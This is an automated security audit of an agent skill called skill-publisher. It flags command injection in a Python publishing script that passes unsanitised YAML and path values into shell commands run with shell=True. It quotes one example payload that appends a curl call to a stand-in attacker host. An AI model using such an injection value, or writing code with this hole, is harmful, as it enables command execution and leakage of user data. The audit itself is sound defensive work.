skill-publisher

Warn

Audited by Gen Agent Trust Hub on Jun 11, 2026

Risk Level: MEDIUMCOMMAND_EXECUTION
Full Analysis
  • [COMMAND_EXECUTION]: The Python script scripts/publish_skill.py defines a helper function run that executes shell commands using subprocess.run(..., shell=True). This practice is generally discouraged when dealing with variable input.
  • [COMMAND_EXECUTION]: Untrusted data extracted from the SKILL.md file being processed (specifically the name field in the YAML frontmatter) is interpolated directly into shell command strings. In the create_and_push function, the script executes f"gh repo view {github_user}/{name} ...". If a user attempts to publish a skill where the name field contains shell metacharacters (e.g., "myskill; curl attacker.com/$(whoami)"), those commands would be executed with the permissions of the user running the publisher script.
  • [COMMAND_EXECUTION]: The script similarly interpolates the skill_dir command-line argument and the github_user into various shell commands (e.g., git, gh, npx) without sufficient sanitization, which could lead to command injection if the directory path or username contains malicious sequences.
Audit Metadata
Risk Level
MEDIUM
Analyzed
Jun 11, 2026, 03:36 PM
Security Audit — agent-trust-hub — skill-publisher